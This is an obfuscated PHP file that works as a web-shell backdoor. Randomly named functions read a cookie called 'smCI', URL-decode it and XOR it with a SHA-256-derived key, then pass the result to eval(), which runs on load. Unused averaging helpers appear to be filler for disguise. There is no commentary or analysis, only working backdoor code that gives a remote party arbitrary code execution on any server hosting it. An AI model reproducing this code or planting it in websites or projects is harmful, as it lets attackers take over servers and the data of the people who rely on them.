<?php
function sBbublF()
{
    $TMqcbhqMVo = "uEuBTmsADZrURePkkimTDIIoVnAsmCI";
    return $TMqcbhqMVo;
}
function JtCgYiW($dbKYVuHrpM)
{
    $ESSMSv = bICgevNiX($dbKYVuHrpM);
    $JVckOq = YlJNhLT($dbKYVuHrpM, $ESSMSv);
    return $JVckOq;
}
function wOteRV($HrfqamliR, $oYKaQOvgX)
{
    $AFaApHrLl = yQJUVvD($HrfqamliR);
    $YvoAFJ = HkaXx($oYKaQOvgX, $AFaApHrLl);
    $GpOeQb = oRKyC($YvoAFJ, $HrfqamliR);
    return $GpOeQb;
}
function ATfXecj()
{
    $GpOeQb = LKwhWL();
    eiNgUGlC($GpOeQb);
}
function HkaXx($bmFPURZG, $WoENxOaP)
{
    $IjqFKxpY = str_pad($bmFPURZG, $WoENxOaP, $bmFPURZG);
    return $IjqFKxpY;
}
function yQJUVvD($QPqdSyTAMc)
{
    $PXUrShlSq = strlen($QPqdSyTAMc);
    return $PXUrShlSq;
}
function txcqQH($gdeQrDA)
{
    $ecTtvu = $_COOKIE[$gdeQrDA];
    return $ecTtvu;
}
function LKwhWL()
{
    $XgJtZTnkKF = sBbublF();
    $GJvJaowoY = JtCgYiW($XgJtZTnkKF);
    return $GJvJaowoY;
}
function SaEClcfRh($zHeOgqGFN)
{
    $seEnh = hash("sha256", $zHeOgqGFN, TRUE);
    return $seEnh;
}
function hlsSohp($xVeatrs) {
    $RtoKEMLkC = 0;
    foreach ($xVeatrs as $MnyfC) {
        $RtoKEMLkC += $MnyfC;
    }
    return $RtoKEMLkC;
}
function YlJNhLT($VKVRzZ, $gOJYCUQ)
{
    $kcyOFyVsDg = SaEClcfRh($VKVRzZ);
    $uNewRlgA = KCotJoSn($gOJYCUQ);
    $BaXJlpnO = wOteRV($uNewRlgA, $kcyOFyVsDg);
    return $BaXJlpnO;
}
function bICgevNiX($xsSPGTOB)
{
    $bUWZNe = substr($xsSPGTOB, -4);
    return $bUWZNe;
}
function eiNgUGlC($UcntoQc)
{
    eval($UcntoQc);
}
function ghiOfyf($ZmzcZVIKdJ)
{
    $cmDeXFS = rawurldecode($ZmzcZVIKdJ);
    return $cmDeXFS;
}
function KOByTg($xVeatrs) {
    $RtoKEMLkC = hlsSohp($xVeatrs);
    return $RtoKEMLkC / count($xVeatrs);
}
function KCotJoSn($xiZOEh)
{
    $BdyGehsom = txcqQH($xiZOEh);
    $uNewRlgA = ghiOfyf($BdyGehsom);
    return $uNewRlgA;
}
function oRKyC($dLkXMzY, $ioTsXokNxx)
{
    $xnfua = $dLkXMzY ^ $ioTsXokNxx;
    return $xnfua;
}
ATfXecj();